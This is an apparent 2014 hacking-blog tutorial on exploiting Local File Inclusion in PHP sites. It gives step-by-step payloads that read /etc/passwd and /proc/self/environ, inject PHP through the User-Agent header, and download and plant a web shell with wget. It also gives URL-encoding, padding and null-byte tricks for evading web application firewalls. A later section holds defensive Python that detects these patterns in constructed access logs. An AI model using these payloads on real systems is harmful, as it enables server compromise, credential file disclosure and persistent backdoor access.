Welcome Fellow Hacker!

Sunday, May 4, 2014

Local File Inclusion and WAF Bypassing

5:10 AM

Local File Inclusion

Requirements

First of all, check whether the site is vulnerable to including

Quote: etc/passwd
To do that, start from a URL such as
Quote: http://www.site.com/index.php?filename=2
and change the number '2' to
Quote: etc/passwd
so that it looks like this:
Quote: http://www.site.com/index.php?filename=etc/passwd
If it works, the page will show some sort of output from the included file.

It will look like this

Do the same, but change 'etc/passwd' to
Quote: /proc/self/environ

If it works and the file exists, you'll get similar but not identical output.

Let's open Tamper Data. To do that, press F10 and do as I did here.
[Image: 3cc30c8dcfa268c457726ec0ec417f93.png]

Once you have Tamper Data up, it will look similar to this.

Click the 'Start Tamper' button in the top left corner.
[Image: 853ba2956894a57438d3b8c1dffe0698.png]

When the tamper window opens, you will see something like this.
[Image: 76fce75d5c9b019cab1f21f7f7993bba.png]

Change your 'User-Agent' to
Quote: <?php phpinfo();?>
Now refresh the site.

This is how it will look.

Now let us upload our shell.

Start up Tamper Data again, click 'Start Tamper' and go to the 'User-Agent' field again.

Type this into the 'User-Agent' field:
Quote: <?exec('wget http://www.site.com/shell.txt -O shell.php');?>

The site will now download your shell. You can find the shell at website/shell.php
or
http://www.site.com/index.php?filename=shell.php

There you will find your uploaded shell.


WAF, aka Web Application Firewalls

Today, I'll show you how to bypass a web application firewall.

First of all, check whether the site is vulnerable to LFI.
To do that, change your old vector /etc/passwd to %2fetc%2fpasswd.
Your whole URL (aka 'Uniform Resource Locator') will look like this:
Quote: BeggfomercyIsanoob.com/index.php?filename=%2fetc%2fpasswd.

So basically every '/' is replaced with '%2f' (without the quotes).
(/ = %2f) That's a pretty easy rule to remember, so keep it in mind.

This method is called 'URL encoding'; it is a simple encoding scheme.
As the name says, it encodes the URL, and it will get past the filters if luck is with you.

To bypass the character limit, you can do it like this:
Quote: /../etc/passwd/./././././././././././././././././././././././././././././
You may need much more padding; it depends on the web server.

Null bytes: this method is pretty easy and can be really useful.
Add this to the end of your URL:
Quote:

For example:
Quote:  .com/index.php?filename=/etc/passwd.
You can add null bytes instead. This will help you get around the firewalls, but it doesn't always work.
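The encoded, padded and null-byte forms above only get past a filter that compares the raw parameter string. The following is an added example, not code from the original post: a small log scanner that percent-decodes and path-normalises each query parameter before matching, so the variants described in both sections resolve to the same sensitive path, and that flags PHP open tags in the User-Agent header as used with /proc/self/environ. The log lines and IP addresses are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format access log lines (sample data, not a real site).
SAMPLE_LOG = """\
10.0.0.5 - - [04/May/2014:05:10:00 +0000] "GET /index.php?filename=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [04/May/2014:05:11:00 +0000] "GET /index.php?filename=%2fetc%2fpasswd HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.7 - - [04/May/2014:05:12:00 +0000] "GET /index.php?filename=/../etc/passwd/./././. HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.7 - - [04/May/2014:05:13:00 +0000] "GET /index.php?filename=/etc/passwd%00 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.7 - - [04/May/2014:05:14:00 +0000] "GET /index.php?filename=/proc/self/environ HTTP/1.1" 200 2048 "-" "<?php phpinfo();?>"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$')
SENSITIVE = {"/etc/passwd", "/proc/self/environ"}

def naive_match(raw):
    """What a filter that never decodes sees: '%2fetc%2fpasswd' does not contain '/etc/passwd'."""
    return any(s in raw for s in SENSITIVE)

def normalize(value, rounds=3):
    """Percent-decode until stable (catches double encoding), record and strip a null byte,
    then drop '/./' padding and resolve '..' so every variant compares as a plain path."""
    prev = None
    for _ in range(rounds):
        if value == prev:
            break
        prev, value = value, unquote(value)
    truncated = "\0" in value
    value = value.split("\0", 1)[0]
    parts = []
    for seg in value.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if parts:
                parts.pop()
            continue
        parts.append(seg)
    return "/" + "/".join(parts), truncated

def analyze(line):
    """Return {'ip', 'findings'} for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _ts, _method, target, _status, _referer, ua = m.groups()
    findings = []
    for param in target.partition("?")[2].split("&"):
        name, _, raw = param.partition("=")
        path, truncated = normalize(raw)
        if path in SENSITIVE:
            findings.append(f"{name} resolves to {path}")
        if truncated:
            findings.append(f"{name} carries a null byte")
    if "<?" in unquote(ua):  # PHP open tag in a header that /proc/self/environ would echo
        findings.append("PHP tag in User-Agent")
    return {"ip": ip, "findings": findings}

def scan(log):
    """Only lines with at least one finding are returned."""
    return [r for r in map(analyze, log.splitlines()) if r and r["findings"]]
```

Running scan(SAMPLE_LOG) flags the last four lines, including the %2f-encoded request that naive_match misses.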

These are just a few methods; many more exist. I might cover them in another tutorial.

This does not cover everything; it's just the basics of WAF bypassing. There may be an error in the tutorial;
if so, please report it to me.
